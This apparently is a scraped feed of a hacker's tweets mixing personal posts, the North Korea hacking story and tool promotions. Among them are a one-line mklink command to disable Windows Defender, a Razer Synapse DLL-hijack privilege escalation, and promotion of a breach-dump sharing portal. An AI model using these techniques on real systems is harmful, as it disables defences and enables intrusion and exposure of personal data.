Owner of Hyperion Gray. Hacker. Former DARPA research tech lead. P4x. North Korea's sexiest man of the yr. AI/ML/Data/Kubernetes/Parallel Computing nerd. 0days.
I love the art here. Also wonderful being on the show. These folks are AMAZING journalists, professionals, and producers. Also super friendly and kind people. LOL I can't believe you all included the "Kim Jong Un's PC, Kim Jong Un's Porn Computer". Wonderful, truly. Thanks y'all
When North Korea hacked Alejandro Caceres (
@_hyp3ri0n
), he expected the U.S. government to rush to his defense. When they just shrugged, he took matters into his own hands.
LISTEN:
Hey folks, story time. A guy going by the name James Willy approached me about help with a 0-day. After providing a writeup on root cause analysis I realized the visual studio project he gave me was backdoored.
<-- Troy I have to be honest with you, HIBP has never sat right with me, and now even less. I'm the owner/creator of an *actual open data breach community* that aims to make selling data breaches worthless.
folks please help me get this word out.
@Crowdstrike
named some ransomware PunkSpider, literally the name of one of the pieces of software I made. Completely unrelated of course, mine is a security tool.
This is NOT cool, appreciate RTs to get them to change this.
20k to anyone that gives me his full identity and address (and it's proven correct ofc). I will of course be approaching proper authorities at the DoD and LEA tomorrow. Thanks all.
he goes by the name James0x40 on twitter (now banned),
@kw0dem
on telegram, gmail is kvlpmap
@gmail
.com, and djokovic808 (maybe a tennis fan!?). Anyway, yes I was hacked. No, no customer information was leaked, this was on a private VM for this exact reason. Anyway I'm offering
@the_ens
someone vetted by a friend sent me a visual studio project which i opened (not an executable, the executable in the project was a real 0-day vuln). And it was in a VM for that exact reason. And it's a scam a lot have been going down with rn. So chill.
@alexaaronpena
oh, you don't know me :P. I just like fucking with people. If someone scans the site it'll throw false positives for sql injection, OS command injection, sensitive info leak, password on page, possibly some overflow something, and generally come back horrible. I think it's funny
Folks i’d like to announce that I AM OFFICIALLY DIVORCED. I’d like to thank everyone that made it happen including my ex wife and our lawyers. We gave it 110% and came out ahead, good job everyone.
Now who wants to date or some shit i don’t know how this works
Looking for good infosec courses and if i see another goddamn basic buffer overflow course or tutorial i'm gonna lose my shit. Any recommendations for intermediate level? Stuff like heap exploitation, kernel fuzzing, and such?
No SANS please, I don't currently have 1mil USD
Yep, he would've been 77 and still rocking those snakey improv solos and soothing voice :-/. What a great musician.
If you haven't had a chance to catch
@deadandcompany
shows or recordings highly recommend it. John Mayer slays the vocals and guitar and well Bob Weir is Bob Weir.
0day course is back in action January 31st! not for the faint of heart but tons of fun. Please note this is a *hacking* course not an infosec training so brings the right mindset :-)!! All are welcome!
@alexaaronpena
i'm just lightly fucking with people :). Security sites alwars get attempted hacks so I play with the people that try. Last iteration if someone inserted an apostrophe it'd take them to a "there is an error in your sql query...." page. We didn't even use SQL. Good fun!
to make myself feel better here's a 0-day in Razer Synapse (the keyboard/mouse you get at best buy). Razer Synapse Service looks for a DLL in ProgramData that doesn't exist and is writable by low priv process (hid.dll). It runs as system. Hijack and boom.
our 0-day course is back in action:
Not a hard prereq but you should generally be able to sort of understand stuff at or at the very least have the will to learn it.
I turned a multimillion dollar company (HG) into something that produced enough to pay our people 275k a year. I took about half the salary than a mcdonald’s manager in the same area and gave my people more. I just want to note my fucking money is where my mouth is.
okay! thank you everyone for your support with the
@CrowdStrike
stuff. As a final update I’m done here on twitter with them and will be moving to comms with my IP lawyer. This is a clear violation of common law trademark and more, but I won’t say much more. Just that your belp
@Remroum
Bill Maher is just an asshole. He likes playing the smart guy and making others look dumb (why i hated the movie religulous even as a non-religious person). He clearly doesn't understand the medium and what it represents to so many.
wtaf 11,000 upvotes???????????? The TOP of AMA literally all day??????? I seriously thought it would hit like max 10 lol.
Does... does that mean you guys love me ❤️?
@hanno
@esizkur
it is well known. Visual studio even WARNS YOU to not open untrusted projects. But it was third-hand with a trusted party in between and i was just helping out with some analysis so i thought it was good. It was not.
@ez_ozel
@DARPA
@ambivalentricky
hey I thought the same before I started working with them on counter human trafficking and counter a bunch of awful stuff online. Along with advancing CS massive amounts. I've never met anyone at DARPA that didn't have their head in the right place. And they're OSS pioneers!
@JC_SoCal
FS-ISAC, it’s a small con but bigger than i expected. Surprised about the speaker thing, they made me wait outside the con until my talk to go in.
Phew finally have something interesting to tweet... check out on how to fuzz GUI/GTK+ application w/ American Fuzzy Lop (AFL), the latest hawtness in fuzzers! Would love another pair of eyes from experienced folks like
@lcamtuf
and others who have used AFL
ok I posted an AMA on reddit, it’s probably going to get like 4 upvotes lol. But it’s there for anyone that wants to ask me anything about the NK Happenings
somebody just blocked me because "are you the person that keeps logging me out of my instagram?". I wish I was making that up. If I had the power to do that I'd log everyone out of their instagram. We are all logged out of insta on this blessed day.
Can i get RTs for Scylla? A project to provide FREE access to full db dumps to sec researchers, academics, gov't, etc. ONLY. No skiddies allowed, vetting is done on everyone, shoot me an email at acaceres
@hyperiongray
.com
anyone want to hire me as a CISO, here are my relevant skills:
(1) know about security
(2) hate managing people
(3) like ordering people around
(4) good at looking busy and always stressed
(5) Excellent gaslighting skills
Relevant experience:
(1) killing baby seals
When an appliance tells me that it's off, how do I know it's telling the truth? I mean it's off and can't report on its own state. I suspect my toaster is hiding something.
I had a funny convo today:
Me: Hey found a 0day in your shit, can you fix within 30 days? Can help, super simple.
X: No it will take 6 months AT LEAST
Me: OK I'm releasing the vuln in 14 days.
X: 30 days is more than enough, can we have 30 please?
@alessabcd
@stark__tara
my beautiful little Clonazepam. She has such a calming presence. Not like her hyperactive brother amphetamine/dextroamphetamine_salts.
i'm sorry but what the fuck OWASP? From your guide:
PunkSpider is web application vulnerability search engine. It is of little use for a penetration tester doing manual work. However it can be useful as demonstration of easiness of finding vulnerabilities by script-kiddies.
It's that time of month where I complain about
@firefox
ptrace protection. In Linux this means bypass of all protections available (tested on clean Ubuntu Linux).
You have weak ptrace perms. Here is a snippet of basic ptrace protection/1
src:
This has to be a well-known trick in infosec right? One on the right is an executable and opens as such when double clicked.
First one to get how this was all done gets a free ABSOLUTELY NOTHING.
Got an LPE and want to kill Defender?
Command = <: mklink "C:\ProgramData\Microsoft\Windows Defender:wtf" \ :>
then restart it/kill it with driver from something like process hacker. Defender dead.
(greetz to anonymous person on discord for technique)
massive update to . It is now open without auth. If you missed that last db dump download check out . It's been updated to include the "Collection
#1
-5" dump and the EU Antipublic dump. Missed a db download? It's probably on there!
$ sudo apt install python3-pip p7zip p7zip-rar
$ sudo pip3 install dtrx
$ dtrx file_to_extract
You'll never have to remember any goddamn extraction flags ever again. dtrx extracts it automatically (and stands for Do The Right Extraction). Great little tool.
folks my apologies but I'm stumped. I have no idea why is down and I can't seem to figure it out. Normally I would but... no. I'll be reinstalling tomorrow (database is still fine)
@101010Mingdao
@notshenetworks
naw man some people don’t know the nerdy shit we know because we do this professionally. Helping out folks like this, imo, is exactly what we’re trying to do here. It’s not sexy, it’s not the next big sploit, but it’s important.
honestly why do we ever have default user/pass on anything. Just make the user set a password or the install won't continue. Why do only super important networking devices and shit all have this default user/pass bullshit?
Announcing the official 1.0 release of mass scanner proj. by Hyperion Gray. Version includes 100+ nmap NSE scans, 100+ ports scanned and banner grabbed, and web scans with our new custom fuzzer. All searchable via faceted front-end! Check it out!
hello everybody! got a brand new search portal. Enjoy and please use responsibly. Umm interested parties may be
@notdan
@Viss
@blackroomsec
. RT if you got it folks and let me know if you find any bugs :).
dear
@th3j35t3r
, I wanted to apologize for the ugliness the other day. I was being a cocky asshole and it was a stressful time (which is no excuse but some context). We're on the same side and I hope we can continue to be. Much love.
- Alex
Dropchat is a safe, anonymous no-frills clientless chat application over Tor ephemeral hidden services. v1.1.2-alpha is officially released! It now has JS support (if you want it, works without js too) and improved user experience. check it out here!
this space (hacking/infosec) is scary because there’s always someone who is a million times better than you. Unless you’re Charlie Miller or something.
isn't it kinda bullshit that we tell everyone to lock things down defense in depth etc. yet most people use Kali Linux as root only (even for browsing!) to save from the headache of some tools working only as root
. <— shell32 API is fucking swiss cheese. 3 non responsibly disclosed 0 days here and more coming (bottom part where i fuzz it). Even more not coming and gonna get weaponized/sold ;-). I’ll rant tomorrow on why I fucking hate responsible disclosure
A tool we wrote that I actually use quite a bit: <-- allows you to go through tor then through another proxy, hiding the fact that you're coming from tor. This has saved me hours in doing recaptchas all day. Please use carefully.
“responsible” disclosure is fucking bullshit. There I said it. Keep doing other people’s jobs for them for free and they’ll never do it themselves.
Vulnerable products SHOULD get owned and therefore exit the market. Make them feel it in their wallets or nothing will change.